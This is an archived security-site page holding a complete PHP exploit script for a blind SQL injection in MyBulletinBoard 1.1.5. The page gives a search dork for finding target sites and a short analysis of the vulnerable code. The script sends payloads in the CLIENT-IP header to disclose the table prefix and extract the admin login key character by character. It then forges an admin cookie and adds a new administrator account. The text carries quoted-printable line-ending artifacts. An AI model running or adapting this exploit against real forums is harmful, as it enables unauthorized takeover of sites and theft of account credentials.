TUCoPS :: Web BBS :: Frequently Exploited :: b06-3649.htm

MyBulletinBoard (MyBB) 1.1.5 'CLIENT-IP' sql injection
MyBulletinBoard (MyBB) 1.1.5 'CLIENT-IP' sql injection
MyBulletinBoard (MyBB) 1.1.5 'CLIENT-IP' sql injection



#!/usr/bin/php -q -d short_open_tag=on=0D
rgod@autistici.org\n";=0D 
echo "site: http://retrogod.altervista.org\n";=0D 
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";=0D
/*=0D
works regardless of php.ini settings=0D
*/=0D
if ($argc<3) {=0D
echo "Usage: php ".$argv[0]." host path OPTIONS\n";=0D
echo "host:      target server (ip/hostname)\n";=0D
echo "path:      path to MyBB\n";=0D
echo "Options:\n";=0D
echo "   -T[prefix]   specify a table prefix different from default (mybb_)\n";=0D
echo "   -u[number]   specify a user id other than 1 (usually admin)\n";=0D
echo "   -p[port]:    specify a port other than 80\n";=0D
echo "   -P[ip:port]: specify a proxy\n";=0D
echo "   -d:          disclose table prefix (reccomended)\n";=0D
echo "Example:\r\n";=0D
echo "php ".$argv[0]." localhost /MyBB/ -d\r\n";=0D
echo "php ".$argv[0]." localhost /MyBB/ -Tmy_\r\n";=0D
die;=0D
}=0D
/* software site: http://www.mybboard.com/=0D 
=0D
   vulnerable code in inc/functions.php near lines 1292-1320:=0D
=0D
   ...=0D
   function getip() {=0D
	global $_SERVER;=0D
	if($_SERVER['HTTP_X_FORWARDED_FOR'])=0D
	{=0D
		if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))=0D
		{=0D
			while(list($key, $val) = each($addresses[0]))=0D
			{=0D
				if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))=0D
				{=0D
					$ip = $val;=0D
					break;=0D
				}=0D
			}=0D
		}=0D
	}=0D
	if(!$ip)=0D
	{=0D
		if($_SERVER['HTTP_CLIENT_IP'])=0D
		{=0D
			$ip = $_SERVER['HTTP_CLIENT_IP'];=0D
		}=0D
		else=0D
		{=0D
			$ip = $_SERVER['REMOTE_ADDR'];=0D
		}=0D
	}=0D
	return $ip;=0D
}=0D
...=0D
=0D
you can spoof your ip address through the CLIENT-IP http header...=0D
as result you can inject sql statements in class_session.php at lines 36-68:=0D
by calling the main index.php script=0D
...=0D
function init()=0D
	{=0D
		global $ipaddress, $db, $mybb, $noonline;=0D
		//=0D
		// Get our visitors IP=0D
		//=0D
		$this->ipaddress = $ipaddress = getip();=0D
=0D
		//=0D
		// User-agent=0D
		//=0D
		$this->useragent = $_SERVER['HTTP_USER_AGENT'];=0D
		if(strlen($this->useragent) > 100)=0D
		{=0D
			$this->useragent = substr($this->useragent, 0, 100);=0D
		}=0D
=0D
		//=0D
		// Attempt to find a session id in the cookies=0D
		//=0D
		if($_COOKIE['sid'])=0D
		{=0D
			$this->sid = addslashes($_COOKIE['sid']);=0D
		}=0D
		else=0D
		{=0D
			$this->sid = 0;=0D
		}=0D
=0D
		//=0D
		// Attempt to load the session from the database=0D
		//=0D
		$query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");=0D
...=0D
=0D
injection is blind, but you can ask true-false questions to the database to=0D
retrieve the admin loginkey.=0D
Through that you can build an admin cookie and create a new admin user through=0D
the admin/users.php script.=0D
Also you can disclose table prefix.=0D
=0D
--------------------------------------------------------------------------------=0D
=0D
=0D
-*****************************************************************************-=0D
*                                                                            *=0D
* Italia - Germania 2-0, al 114' forse il pi=F9 bel gol che abbia mai visto    *=0D
* grazie Grosso!                                                             *=0D
*                                                                            *=0D
-*****************************************************************************-=0D
 */=0D
=0D
error_reporting(0);=0D
ini_set("max_execution_time",0);=0D
ini_set("default_socket_timeout",5);=0D
=0D
function quick_dump($string)=0D
{=0D
  $result='';$exa='';$cont=0;=0D
  for ($i=0; $i<=strlen($string)-1; $i++)=0D
  {=0D
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))=0D
   {$result.="  .";}=0D
   else=0D
   {$result.="  ".$string[$i];}=0D
   if (strlen(dechex(ord($string[$i])))==2)=0D
   {$exa.=" ".dechex(ord($string[$i]));}=0D
   else=0D
   {$exa.=" 0".dechex(ord($string[$i]));}=0D
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}=0D
  }=0D
 return $exa."\r\n".$result;=0D
}=0D
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';=0D
function sendpacketii($packet)=0D
{=0D
  global $proxy, $host, $port, $html, $proxy_regex;=0D
  if ($proxy=='') {=0D
    $ock=fsockopen(gethostbyname($host),$port);=0D
    if (!$ock) {=0D
      echo 'No response from '.$host.':'.$port; die;=0D
    }=0D
  }=0D
  else {=0D
   $c = preg_match($proxy_regex,$proxy);=0D
    if (!$c) {=0D
      echo 'Not a valid proxy...';die;=0D
    }=0D
    $parts=explode(':',$proxy);=0D
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";=0D
    $ock=fsockopen($parts[0],$parts[1]);=0D
    if (!$ock) {=0D
      echo 'No response from proxy...';die;=0D
   }=0D
  }=0D
  fputs($ock,$packet);=0D
  if ($proxy=='') {=0D
    $html='';=0D
    while (!feof($ock)) {=0D
      $html.=fgets($ock);=0D
    }=0D
  }=0D
  else {=0D
    $html='';=0D
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {=0D
      $html.=fread($ock,1);=0D
    }=0D
  }=0D
  fclose($ock);=0D
  #debug=0D
  #echo "\r\n".$html;=0D
}=0D
=0D
function make_seed()=0D
{=0D
   list($usec, $sec) = explode(' ', microtime());=0D
   return (float) $sec + ((float) $usec * 100000);=0D
}=0D
srand(make_seed());=0D
$anumber = rand(1,99999);=0D
=0D
$host=$argv[1];=0D
$path=$argv[2];=0D
$port=80;=0D
$prefix="mybb_";=0D
$user_id="1";//admin=0D
$proxy="";=0D
$dt=0;=0D
for ($i=3; $i<$argc; $i++){=0D
$temp=$argv[$i][0].$argv[$i][1];=0D
if ($temp=="-p")=0D
{=0D
  $port=str_replace("-p","",$argv[$i]);=0D
}=0D
if ($temp=="-P")=0D
{=0D
  $proxy=str_replace("-P","",$argv[$i]);=0D
}=0D
if ($temp=="-T")=0D
{=0D
  $prefix=str_replace("-T","",$argv[$i]);=0D
}=0D
if ($temp=="-u")=0D
{=0D
  $user_id=str_replace("-u","",$argv[$i]);=0D
}=0D
if ($temp=="-d")=0D
{=0D
  $dt=1;=0D
}=0D
}=0D
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}=0D
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}=0D 
=0D
if ($dt)=0D
{=0D
$sql="'suntzuuuu/*";=0D
echo "sql -> ".$sql."\r\n";=0D
$packet ="GET ".$p."index.php HTTP/1.0\r\n";=0D
$packet.="CLIENT-IP: $sql\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Connection: Close\r\n\r\n";=0D
sendpacketii($packet);=0D
if (eregi("You have an error in your SQL syntax",$html))=0D
{=0D
 $temp=explode("sessions",$html);=0D
 $temp2=explode(" ",$temp[0]);=0D
 $prefix=$temp2[count($temp2)-1];=0D
 echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n";=0D
}=0D
else=0D
{=0D
echo "unable to disclose table prefix...\n";=0D
}=0D
sleep(1);=0D
}=0D
=0D
$chars[0]=0;//null=0D
$chars=array_merge($chars,range(48,57)); //numbers=0D
$chars=array_merge($chars,range(65,90));//A-Z letters=0D
$chars=array_merge($chars,range(97,122));//a-f letters=0D
$j=1;=0D
$loginkey="";=0D
while (!strstr($loginkey,chr(0)))=0D
{=0D
for ($i=0; $i<=255; $i++)=0D
{=0D
if (in_array($i,$chars))=0D
{=0D
$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*";=0D
echo "sql -> ".$sql."\r\n";=0D
$packet ="GET ".$p."index.php HTTP/1.0\r\n";=0D
$packet.="CLIENT-IP: $sql\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Connection: Close\r\n\r\n";=0D
sendpacketii($packet);=0D
if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;}=0D
}=0D
if ($i==255) {die("Exploit failed...");}=0D
}=0D
  $j++;=0D
}=0D
$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";";=0D
echo "admin cookie -> ".$cookie."\r\n";=0D
=0D
=0D
$data='-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name="action";=0D
=0D
do_add=0D
-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name="userusername";=0D
=0D
suntzu'.$anumber.'=0D
-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name="newpassword";=0D
=0D
suntzu'.$anumber.'=0D
-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name="email";=0D
=0D
suntzoi@suntzu.org=0D 
-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name="usergroup";=0D
=0D
4=0D
-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name="additionalgroups[]";=0D
=0D
4=0D
-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name="displaygroup";=0D
=0D
4=0D
-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name="Add User";=0D
=0D
  Add User=0D
-----------------------------7d62702f250530--=0D
';=0D
=0D
$packet="POST ".$p."admin/users.php HTTP/1.0\r\n";=0D
$packet.="User-Agent: Googlebot/2.1\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";=0D
$packet.="Content-Length: ".strlen($data)."\r\n";=0D
$packet.="Cookie: ".$cookie."\r\n";=0D
$packet.="Connection: Close\r\n\r\n";=0D
$packet.=$data;=0D
sendpacketii($packet);=0D
if (eregi("The user has successfully been added",$html))=0D
{=0D
  echo "exploit succeeded... now login as admin\n";=0D
  echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n";=0D
}=0D
else=0D
{=0D
  echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n";=0D
}=0D
?>=0D
=0D
original url: http://retrogod.altervista.org/mybb_115_sql.html=0D 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH